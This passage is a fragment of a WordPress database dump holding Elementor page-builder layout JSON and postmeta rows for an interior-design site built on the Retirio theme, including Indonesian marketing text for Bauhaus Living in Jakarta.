\\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4280,4929,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4281,4929,'_elementor_pro_version','3.8.1'),(4283,4930,'_wp_page_template','elementor_header_footer'),(4284,4930,'_elementor_edit_mode','builder'),(4285,4930,'_elementor_template_type','wp-page'),(4286,4930,'_elementor_version','3.8.1'),(4287,4930,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus Living!<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Sejak tahun 2005, Bauhaus Living telah menjadi pilihan utama untuk solusi desain interior berkualitas tinggi di Jakarta dan sekitarnya. Dengan pengalaman yang telah teruji dalam menangani lebih dari 300 proyek residential dan commercial, kami siap membawa keindahan, kenyamanan, dan kepribadian ke dalam ruang Anda.<\\/p><p>Kami tidak hanya menciptakan desain interior yang estetis, tetapi juga mengubah ruang tempat tinggal atau tempat kerja Anda menjadi cerminan karakter dan selera pribadi Anda.<\\/p><p>Setiap proyek kami adalah sebuah karya seni yang unik, menggabungkan fungsionalitas dengan gaya, sehingga menciptakan lingkungan yang memikat dan berkelas.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian 